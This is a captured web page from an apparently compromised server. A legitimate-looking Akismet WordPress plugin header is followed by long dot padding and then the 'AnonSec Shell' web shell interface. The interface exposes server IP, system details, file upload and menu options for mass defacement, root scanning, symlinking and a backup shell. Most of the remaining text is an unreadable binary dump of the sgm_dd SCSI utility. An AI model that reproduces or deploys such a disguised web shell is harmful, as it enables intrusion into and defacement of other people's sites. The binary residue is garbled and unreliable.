#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 62.109.13.187  /  Your IP : 216.73.216.11   [ Reverse IP ]
Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28
System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : mosrembit ( 6064)
PHP Version : 8.2.28
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /usr/bin/sgm_dd
ELF>�0@@�v@8	@@@@@@��88@8@@@l^l^ nn`n`h� nn`n`��TT@T@DDP�td�Y�Y@�Y@��Q�tdR�tdnn`n`/lib64/ld-linux-x86-64.so.2GNU GNU�M̝v��\q�C��TB)�� @)+.BE���|�qX���9����U!�C��xe�>���k�O�1��� �a��7T��d�#2r���hq`��q`�hq`=�
@Hpq`�C@libsgutils2.so.2__gmon_start__sg_ll_readcap_10sg_get_num_initsg_ll_readcap_16sg_get_llnumsg_err_category3sg_ll_sync_cache_10sg_chk_n_print3_finilibc.so.6strncmpperror__open64_2mmap64strncpy__stack_chk_failgetpidkillstrlensigemptysetmemset__errno_locationopen64read__fprintf_chkfputcmalloc__xstat64stderrioctl__snprintf_chkfwritegettimeofdaysigactioncloselseek64strchrsleepstrcmp__libc_start_mainsysconffree_edata__bss_start_endGLIBC_2.7GLIBC_2.4GLIBC_2.2.5GLIBC_2.3.4�ii
�ii
�ui	�ti	��o`pq`-p` p`(p`0p`8p`@p`Hp`Pp`Xp`	`p`
hp`pp`xp`
�p`�p`�p`�p`�p`�p`�p`�p`�p`�p`�p`�p`�p`�p`�p`�p`q`q`q` q`! q`"(q`#0q`$8q`%@q`&Hq`'Pq`(H��H�b H��t�H����5�a �%�a @�%�a h����%�a h�����%�a h����%�a h����%�a h����%�a h����%�a h����%�a h�p����%�a h�`����%�a h	�P����%�a h
�@����%�a h�0����%�a h� ����%�a h
�����%�a h�����%za h���%ra h����%ja h�����%ba h����%Za h����%Ra h����%Ja h����%Ba h����%:a h�p����%2a h�`����%*a h�P����%"a h�@����%a h�0����%a h� ����%
a h�����%a h�����%�` h���%�` h ����%�` h!�����%�` h"����%�` h#����%�` h$����%�` h%����%�` h&����%�` h'�p���ATI��hU��SH��H��dH�%(H�D$1��V�����y�;~��C@�3������`1�H��r����-�����y��C@�������<D�H�$Ic�H�H���=�` I�$tH�=G` I��H���O@�1�����1�H�L$dH3%(t���H��[]A\�AVA�A��AUI��ATI��US1�H��@dH�%(H�D$81��` H�L$�P���E�E1�1�1��$���������D$<����|$����|$����|$�uyH�L$E1�1�1��$A� D���Q���������H�T$H�t$1�H��H��H���B�H	�H9�u�H���T$I�E�D$����	��T$	��T$��	�A�$�L�T$����	��T$	��T$��	��T$H��I�E�D$����	��T$	��T$��	�A�$1�=�^ t#I�ME�$�HO@H�=�^ �1�I���{���H�|$8dH3<%(��t��H��@[]A\A]A^��AWAVAUATUH��S���H���
dH�%(H��$�
1�HDŽ$������D$lHDŽ$������D$p������H�D$HƄ$�Ƅ$�HDŽ$�HDŽ$�HDŽ$�DŽ$�HDŽ$�HDŽ$�HDŽ$�DŽ$����C�H��$�L�u�D$T�D$8E1�L�d��D$0
�D$$
���D$P�D$4H�D$(H�D$@I�6H�����H��������$�I�؄�t <=u�f.���tI��A�<=u�tA�I��D��$�A��b�a��$�<p��<s����$���L����������\ ��	@I��M9��K�����\ ����	�D$4��t\�D$4;s\ tPH�
Z\ �-���Q@����1���H��$�
dH3%(�H���
[]A\A]A^A_Ã|$P��H�D$(H��?���|	H�D$@H��?���k	��$�~H�|$(�������=�[ �~E�� D辰9@����9@�����9@�
���`9@�
����$�<-��
1�E1��D$P��$�<-��A��D$4A����H�[ H����
�|$8���|$PuA�|$$t:HD$@�����H9�����~#H�
�Z �9���V@����D$$�|$4uH�|$0tAH�T$(H�Z �����H9�����~#H�
�Z �9��0W@�D����D$0��$�tc�|$P��1�1��F@�����A��xCH�t$|����!���H��u$�|$|0uH�=-Z �F@��W@�1����D������H��H�D$8�,�=*Z t,1���q`H�Z H��Y �b�����Y �=�Y L�=�Y L�=Z tM��~��$�u�|$P��M���D$H�<Hc�H�D$XH�D$XI9�LO��|$PD��u�b�K����8u�`Y H��D����Hc�������A��x؃=iY ���
5Y D��E9�}!D��H��X ����҉�~
�FY ��Hc�HAY �����|$4�7�|$4u�XD����8u!��X H��D����Hc�������I��A��xՃ=�X �nE���N��X ��A9���
Hc�H-�X L�=\X M��~I)�Hl$@Hl$(M��L�=@X ����E1��=tX t1����|$Tt�|$4��H�|$8H��t���E��tD�������|$4�V
H�=�W t'H�
�W ����F@���E���cDD�1���
 X ��tH�=�W �Y@�1�����|$Ht�L$HH�=�W �@Y@�1��a����cE��AI��6����E@�H�����A��c�a��$�o�o�E@H��L�D$X�1�����L�D$X�E�9E@H��L�D$X������L�D$X�YA��o���G@H��L�D$X����L�D$X���XE@H��L�D$X����L�D$X���]E@H��L�D$X���L�D$X��8D@H��L�D$X���L�D$X��bE@H��L�D$X�m��L�D$X��
��gE@H��L�D$X�Y���
L�D$XL���$����fV ���f���$�t��E@H��L�D$X���L�D$Xtg��E@�H���uoA�8-�hL���M�H���H��U �,���H�
�U � ���P@�a��]����L���x��D$8�D$$�D$0���A��d��A��f�Z��$�u�*�����$�a������$�����L����tDŽ$�������DŽ$��s�����$����L�����������A��D�����$�e�������$��u���L����������$�i�y�����$�o�k�����$��]���L���i��$�����A�x1�����A�x�����}����D$P;XT ����7�����$�f���G@H��L�D$X���L�D$X���$�b�&�����$�s������$��
���L�����D$P���A���H�
�S ���Q@�v��r���H��$�L���������H�
�S � ���P@�9��5�����$��2�����$��'
H��$��L���>����H�
2S �(��(R@�������H�

S ����E@�����H�
�R ���`P@�����H�
�R ����D@�o��k���H�=�R ���Q@�1���R �^�����H�
rR �!��R@�������
^R H�=GR E��_F@�1�A��������
4R H�=R E����X@�1�������i�����$�D�L$$D��D��Q H�L$@H��D��D$��$��$�M �����������XL=�Q �����$�E1��|$PD�L$0D��Q ��H�L$(H��D��D$|H�D$|A��H�D$��$�D�|$�D$��$��$�n������������Hc�H-jQ ��$�������|$|�T$H���H��$�L�������e�H�
�P � ���P@�������e���H��$���=�P �D$Pt*H��$����H�=�P H����E@�1��d��|$P@�
�|$P�0
��$���|$P�W��H��$���@�����$�E��
��$�E�����A���H�D$@H����Lc-P 1�D��L��L�����H����1ۃ=P ���H�=�O L�麸S@�1����d���l�H��$���=�O �D$4�_
�|$4H��$��K�|$4�y
�D$4���c
���r��$�H��$�����������A@�����$�E��
��$�E�����$�E�1�����A���yH�D$(H�����Lc=�N 1�D��L��L����H�����=�N ���H�=�N L����T@�1����f�L����H�D$@H�����H�
�N ���XQ@�,���(�L���J��D$T��H�
JN �2���X@����$�D�L$0��D�1N H�L$(H��D�|$D��D$|H�D$|H�D$��$��D$��$��$�	���L���\�H�D$(H���=�H�
�M ���8Q@�r���n�A�������D���V����H�
�M �>��pW@DŽ$��+���$��N����|$PHDŽ$�������|$P �H��$�H;D$@~
H+D$@H��$��|$4HDŽ$������h�|$4 ��H��$�H;D$(~
H+D$(H��$�H��$�H����H����H9�HO�H��L H��L H�����H�
�L �*���V@�I���E�E���H�H�
oL �;���T@��H�
TL �"��xQ@�����H�
/L �2��`X@�����$�D�L$$D��D�L H�L$@H��D��D$��$��$�g�'����D$T�D$8E1��D$0
�D$$
���D$P�D$4H�D$(H�D$@��L���{���K ���H�L$(H�=tK A�ƺ}F@�1��@���H�L$@H�=OK A�ƺEF@�1������H�=/K H��$���F@�1���E1�E1�1�1�1��D$�$D�������u>H�
�J � ��8V@���D$�$E1�E1�1�1�1�D���������H�
�J ����F@�M��c�H�L$(H�=|J ��X@1���K�D��=qJ H�H�J �����J E1���L�L$(H��$�A��F@���1�E1����H��$�����|$4�a�H�
�I �K��X@��L�=�I �:�=�I ���|$4Hc�t�|$P�H|$H��H��H�D$8��H�D$HH�L$8H�\�H��H!���L��$�A�T@H��$����1���H��$�������H�'I �~���H�I �r���H�T$xH��$�D���A���t,H�=I H��$���U@�1����HDŽ$�����D��H D�L$xE9�����H�=�H H��$���V@�1���HDŽ$��������H�T$xH��$�D���v����A�����f��r�����	H��$�������H�=IH ��U@�1����H�T$tH��$�D���Q���t,H�=H H��$���U@�1����HDŽ$�����D��G D�L$tE9������H�=�G H��$��V@�1���HDŽ$������u���H�=�G ��U@�1��s����H�=�G �hU@�1��V�����H�
jG �!��`V@��H�T$xH��$�D���1�����H�
5G � ��8V@��H�T$tH��$�D����������tX��������	H��$�����tH�=�F ��U@�1����
���H�=�F ��U@�1������H�
�F � ��@U@�N�H�T$tH��$�D���i��s���H�
mF ��� U@��H�=UF �hU@�1��$����L��$�A�pT@���H�
%F ���?E@��������r�A��i�����$�<bt:<f�����$������$�upH��$��L�����"���$�s�����$��r�L���~��D$4�����H�
zE ����P@�&���"�H�
UE ��� E@������lE@H���*���ttA��-����$�?u
��$�tV��	G@H������t��$�V����$���H�=�D �sE@��E@�1���1��x�1��1��j���H��H��H�D$8���H�
�D ���-F@�3���/���	G@H���g����y���H�=HD H�ٺ�E@�1�������L��$�A��S@���1���L��$�A�XS@��������H��$���H�����$�E��
��$�E��(���A��xFH�T$h�Ǿ�"1��^���x
�|$h�uqH�
�C �"���R@�E���A�L��$�A��R@���H��$���E@H�=TC �1��(����H��$��XR@�ԋ9C 1��ʼnD$lH�H�t$HH��t
H���D$H�D$lH�T$h1��r"D���������|$h��D$h �D$l;D$h~H�T$l1��u"D���k���xZ�D$lE1�1�Hc�E������H���H���6�L��$�A�0S@����H�T$p1��u"D��������S@��������R@������H��$����H�=B H����E@�1�����r�A�������$�H��$���������H�����$�E��
��$�E�����A����H�T$h�Ǿ�"1��K�������|$h�u���H�T$h1��r"D���!����� ����|$h��D$h �aA ��;D$h�D$p����H�����Hct$pE1�1�E����k��H���H��L��$�����}���L��$�A��S@�{���H��$�1���j����A�����L��$�A�@T@�I���H�
�@ ����W@�a����]�1�I��^H��H���PTI�C@H��B@H��@�^���f.��oq`UH-hq`H��H��w]øH��t�]�hq`����hq`UH-hq`H��H��H��H��?H�H�u]úH��t�]H�ƿhq`����=�? uUH���~���]��? ��@H�=h< t�H��tU�n`H���]�{����s���UH��1�S��H��H��dH�%(H��$�1����H�<$t%H�|$H�,$�p��1�H���DŽ$��i��H��$�dH3%(u
H�Ĩ[]�����SH��H��dH�%(H��$�1��]��H��tYH��H�޿�7�����@x"�D$%�= t<=`�� D�H��$�dH3%(��uzH�Ġ[À;.u����H�T$(H��H��H�� H��%��	ȃ�t"=��t����t���	��D��H����H��0�	к���s��������E1�@����H���������� ����ua��u<��u��@u�Mc��gC@�I�L����McȾG@�I�A��L�����Ic�H�raw deviA��H�H�9�Ace �McȾUC@�I�A��L����McȾGC@�I�A��
L����a���McȾ-C@�I�A��L����:���� C@�
H��A�������H��H�
= H��tH�=	= �~C@�1�����D�9= H�
:= ��C@H�=�< �Ic�H)�1����D�= H�
�< ��C@H�=�< �H��Ic�H)�1��|��f�f.�H��H�
�< ����0G@�1��H�
j< �����G@���H�
O< �D��xJ@H������AWE��AVE��AUA��Hc�ATA��1�UH��SH��H������D$@��t�KE��t�KA��
���A����A����A��@�k	D�k
����v�H��H��8�CH��H��0�CH��H��(�CH��H�� �CH��H���CH��H���CH��H���CD����C
D����CD����C1�H��[]A\A]A^A_�f�A��@�kD�k	����V�H��H���CH��H���CH��H���CD����CD����CD����CH��1�[]A\A]A^A_�A����A��@�k����
�H��H�����CH��H��A���C��D�k��J�D-�����N@H��u?D|$@�!���H�
m: �@��@N@��������D���N@H�=9: �1��
��H���[]A\A]A^A_�f�A��D�k@�k����*�H��H���CH��H���CH��H���CD���A�����C�s��������N@�w�����C�����H�
�9 �=���M@�E����*����f.�AUATUSH��8dH�%(H�D$(1���9 ����H�=`9 A��uH�=[9 ��H�|$1����L�D$L�L$L+09 L+
19 ���I*�H�=�8 E���I*ȸ�E@��C@��O@�HD�1�D�%�8 H�-9 H��8 �Y� �X��L$����L$f.
� vH)��A*��H*��Y�f.� w>H�5w8 �
�=��H�D$(dH3%(uFH��8[]A\A]�f�I��I��@B�=����Y
P H�=18 ��C@���^��������f�H��H�
8 � ���O@���1������8 ��uH����H���Z���f.�S��H��H�|$H�$dH�%(H��$�1����1�H���DŽ$����H�
s7 ���
D@���1��8�����7 ��t1���������މ��i��H��$�dH3%(u	H�Ġ[�����AW�AVAUI��H��ATU�0D@SH��H��dH�%(H��$1������<$Ƅ$��zH��A�A�A��A�EH��tkH�Ӿ,H�����H����H�P�H��H��L���t����dtf�^D@H��L������7D@H��L�����H��A�Eu�1�H��$dH3%(�/H��[]A\A]A^A_�D�{itJ�^D@H��L���t*�{pu��{ou��{u�A�E�,���@1��F���A�E����@�{ou��{u�A�E�����=D@H��L���uA�E����@��fuK�{uuE�{au?�{u9A�E���@H�
A5 ���!D@���������BD@H��L����m���H�=5 H�ٺGD@�1����������S��AWA��AVE��AUI��ATU��SH���H��$8D��$ H��$�H�t$D�D$D��A�H�D$dH�%(H��$�1���$(�$�B�����A���'H�\$ 1��D�|$H���H���$0H��$��D$ SD�t$(�D$$����H�D$8��D�|$,�	H��$��D$)@�D$H`�D�l$P�D$LH�D$@�=#4 ~!�*@�����8�������1�H�ھ�"���g����xӃ=�3 ~�L$lH�=�3 �{D@�1��n��H��������������������H�\$H��t ������D$p����t
�@H��$�dH3%(D����H���[]A\A]A^A_�@H�D$�D$)@�D$H`�D�l$PH�D$0H��$�H�D$@H�D$H�������������=3 �D$L��H�
�2 ���eD@�_��E��~AL��$�E�~�H��$�M���I���H�=r2 1��uD@��A��M9�L��u�H�5R2 �
����{���H�=92 E��L���O@�1�A����������P@A�������������u31҃="2 H�޿�D@������k���DE1�����1҃=�1 H�޿�D@A���������_����A���P�������f.�AWE��D��AVA��AUATA��USH��H���dH�%(H��$�1���$D��$H�|$pD�D$E1��$���A����H�l$1��D�t$H��=:1 �H�H�D$p�D$SD�|$�D$�����D$@H�D$(H��$��D$8`�D�t$�\$@H�D$0�D$<��H�
�0 ����D@�T��E��~3H�\$pA�G�L�t��H�=v0 1��uD@�H���A��L9�u�H�5U0 �
����!f��+���8����8��1�H�꾅"D��������x҃=C0 ~�L$\H�=�/ �{D@�1�����H���%�����������������D$X0 H��$�dH34%(D����H���[]A\A]A^A_�H�=�/ E��H�ٺ(P@�1�A��L���f.���D@A����������fD��u#1҃=r/ H�D@���J���\���D1҃=O/ H���D@A�����$���@����A���1����[��f.��AWA��AVI��AUI��ATL�%X+ UH�-X+ SL)�1�H��H���%��H��t�L��L��D��A��H��H9�u�H��[]A\A]A^A_Ðf.���H��H���null device SCSI generic (sg) device block device SCSI tape device unable to 'stat' file   remaining block count=%ld
%ld+%d records in
%ld+%d records out
BLKSSZGET ioctl errorBLKGETSIZE64 ioctl error so far at %.2f MB/sec
Interrupted by signal,no flag found
appenddsyncexclnullunrecognised flag: %s
direct    write cdb: %02x       duration=%u ms
Writing, continuingwriting    read cdb: Reading, continuingreadingsgm_dd: SG_IO error (sg_read)sgm_dd: bad argument to 'bs'
cdbszcountSecond 'if=' argument??
iflagSecond 'of=' argument??
seekskiptimeverb--help1.38 20131014sgm_dd: : %s
Unrecognized option '%s'
bpt must be greater than 0
 >> Input file type: %s
sgm_dd: unable to access %s
 >> Output file type: %s
/proc/scsi/sg/allow_dioNot enough user memory
sg_read failed, skip=%ld
read(unix): count=%d, res=%d
sg_write failed, seek=%ld
sgm_dd: writing, seek=%ld >> Synchronizing cache on %s
Unable to synchronize cache
Some error occurred,oflag--versother (perhaps ordinary file) Usage: sgm_dd  [bs=BS] [count=COUNT] [ibs=BS] [if=IFILE] [iflag=FLAGS]
               [obs=BS] [of=OFILE] [oflag=FLAGS] [seek=SEEK] [skip=SKIP]
               [--help] [--version]

               [bpt=BPT] [cdbsz=6|10|12|16] [dio=0|1] [fua=0|1|2|3]
               [sync=0|1] [time=0|1] [verbose=VERB]

  where:
    bpt         is blocks_per_transfer (default is 128)
    bs          must be device block size (default 512)
    cdbsz       size of SCSI READ or WRITE cdb (default is 10)
    count       number of blocks to copy (def: device size)
    dio         0->indirect IO on write, 1->direct IO on write
                (only when read side is sg device (using mmap))
    fua         force unit access: 0->don't(def), 1->OFILE, 2->IFILE,
                3->OFILE+IFILE
    if          file or device to read from (def: stdin)
    iflag       comma separated list from: [direct,dpo,dsync,excl,fua,
                null]
    of          file or device to write to (def: stdout), OFILE of '.'
                treated as /dev/null
    oflag       comma separated list from: [append,dio,direct,dpo,dsync,
                excl,fua,null]
    seek        block position to start writing to OFILE
    skip        block position to start reading from IFILE
    sync        0->no sync(def), 1->SYNCHRONIZE CACHE on OFILE after copy
    time        0->no timing(def), 1->time plus calculate throughput
    verbose     0->quiet(def), 1->some noise, 2->more noise, etc
    --help      print usage message then exit
    --version   print version information then exit

Copy from IFILE to OFILE, similar to dd command
specialized for SCSI devices for which mmap-ed IO attempted
sgm_dd: for 6 byte commands, maximum number of blocks is 256
sgm_dd: for 6 byte commands, can't address blocks beyond %d
sgm_dd: for 6 byte commands, neither dpo nor fua bits supported
sgm_dd: for 10 byte commands, maximum number of blocks is %d
sgm_dd: expected cdb size of 6, 10, 12, or 16 but got %d
      [bgs64] number of blocks=%ld [0x%lx], block size=%d
      number of blocks=%ld [0x%lx], block size=%d
time to transfer data%s: %d.%06d secsProgress report, continuing ...
sgm_dd: bad wr cdb build, to_block=%ld, blocks=%d
sgm_dd: SG_IO error (sg_write)sgm_dd: bad rd cdb build, from_block=%ld, blocks=%d
sgm_dd: bad argument to 'bpt'
sgm_dd: bad argument to 'count'
sgm_dd: bad argument to 'ibs'
sgm_dd: bad argument to 'iflag'
sgm_dd: bad argument to 'oflag'
sgm_dd: bad argument to 'obs'
sgm_dd: bad argument to 'seek'
sgm_dd: bad argument to 'skip'
For more information use '--help'
Assume default 'bs' (block size) of %d bytes
If 'ibs' or 'obs' given must be same as 'bs'
skip and seek cannot be negative
Can't use both append and seek switches
sgm_dd: unable to use scsi tape device %s
sgm_dd: could not open %s for sg readingsgm_dd: sg driver prior to 3.1.22
sgm_dd: SG_GET_RESERVED_SIZE errorsgm_dd: SG_SET_RESERVED_SIZE errorsgm_dd: error using mmap() on file: %ssgm_dd: could not open %s for readingsgm_dd: couldn't skip to required position on %s  >> skip: lseek64 SEEK_SET, byte offset=0x%lx
sgm_dd: could not open %s for sg writingsgm_dd: could not open %s for writingsgm_dd: could not open %s for raw writingsgm_dd: couldn't seek to required position on %s   >> seek: lseek64 SEEK_SET, byte offset=0x%lx
Won't default both IFILE to stdin _and_ OFILE to as stdout
Unit attention(in), continuing
Aborted command(in), continuing
read capacity not supported on %s
read capacity failed, %s not ready
Unable to read capacity on %s
Unable to read block capacity on %s
block size on %s confusion; bs=%d, from device=%d
Unit attention(out), continuing
Aborted command(out), continuing
block size on %s confusion: bs=%d, from device=%d
Couldn't calculate count, please give one
Note: SCSI command size increased to 16 bytes (for 'if')
Note: SCSI command size increased to 16 bytes (for 'of')
>>> dio only performed on 'of' side when 'if' is an sg device
>>> %s set to '0' but should be set to '1' for direct IO
Not enough user memory for raw
Since both 'if' and 'of' are sg devices, only do mmap-ed transfers on 'if'
Unit attention or aborted command, continuing (r)
Unit attention or aborted command, continuing (w)
write(unix): count=%d, res=%d
output file probably full, seek=%ld >> Non-zero sum of residual counts=%d
>> dio requested but _not_ done %d times
���ư>�h㈵��>�@��.A;���������8з��hp���(I���@�����H���p����P�������p������� ���8��`���xp��zRx����*zRx�$�����FJw�?;*3$",D ��yA�F�I�a
AAA$tp���A�J�u
AA�H����0���Ds����YDP|�����B�E�E �H(�F0�D8�G@�
8A0A(B BBBCS
8C0A(B BBBA�
8F0A(B BBBJ,d��B�I�C �G0� AABD�`����B�K�E �D(�A0�Fps0A(A BBB<����^B�B�A �A(�D`

(A ABBC���FDp
DI$<���A�I��
AALd���-B�G�B �H(�A0�F8�G��
8A0A(B BBBFL�p��UB�E�E �E(�A0�C8�G��
8A0A(B BBBEL���B�H�E �B(�D0�A8�J��
8A0A(B BBBDLT@����B�B�B �B(�A0�D8�N�9
8A0A(B BBBAD���eB�E�E �E(�H0�H8�M@l8A0A(B BBB����1@�1@��
@
C@n`n`���o�@@@�@
p`�(
@�	@0	���o�	@���o�oH	@n`&@6@F@V@f@v@�@�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@��������sgm_dd.debug�tC�7zXZ�ִF!t/���]?�E�h=��ڊ̓�N��OU|�J�2Cl�Cg[�X�'�y�JX��\~���p[l���a��W��78(��rn���	��^t����]Ԋ���a�Ӛg$/y@���K?q��;҂�OZ�CQC�k~)�X����X~Ո6[Eۊ:w>�C�@��t��b6�(.��J��H���Aq��l�5�(���Κ�.;�x�ݿ�*��IKo��vx�u��Ԧ����>�a�J�G�͓��\���Q:�Qg�������i���}),	Xq��46V��|)�Ī����L‹��\���F�g.Yl�OK3Bl��,8�?s}��r�"s���4���M�șbG.��(��b�oc�5�"<�\4
o�����o'�� �G@ͫ.FpM���O\.f��&@G�{�W3e�u�mXӿ�EfA��h��8�kJ����N���c����
�~s�m@��b(u��M���;���Ux�@*��=���ʘEY�Ӛ��D�ӧxj�=��&�W��kN���0 qR�q5{@0��~,x��%BͷŘK�B��М�<S�[IdZ+�nMQ��+�FD�|�IT%���ǚ��3��[H�N��K[2�^�޽�z0*��p��Z>��9���B�H�
�Np�\�8_rx��2���x��t"�8���6��_�T��0����d;�D�d��$�{���R�
E2��{$����N�1Mҙ�am��]�obM�{4����J}+�G�A��1%�����εLCl	W�ƌw�p���s;�v��6��g��櫞xNr��g\�=0��k�"Q��l}Oph��ǵ��=�Qeς憶3�_0���&3SbC��n��%��g�����`��M����9
���C��
�q��fn[�vB��H�w��*'@5���T���K�B��;�h\��ݚ���gYI����ā��Sȣ�)M��o_����Nb�`a�bN':_����Xy��2|oHB�=e���$�w�A��]l�=ς���!�Ysn��g�YZ.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.gnu_debuglink.gnu_debugdata8@8T@T !t@t$4���o�@�<>�@�hF@@@N���oH	@H	^[���o�	@�	Pj�	@�	0tB(
@(
�~�
@�
y@���@�b2�C@C	�C@C���Y@�Y��8Z@8Z4�n`n�n`n�n`n�n`n���o`�o�p`pX�Xq`Xq�pq`hqh�hq�|qH�u


Anon7 - 2022
AnonSec Team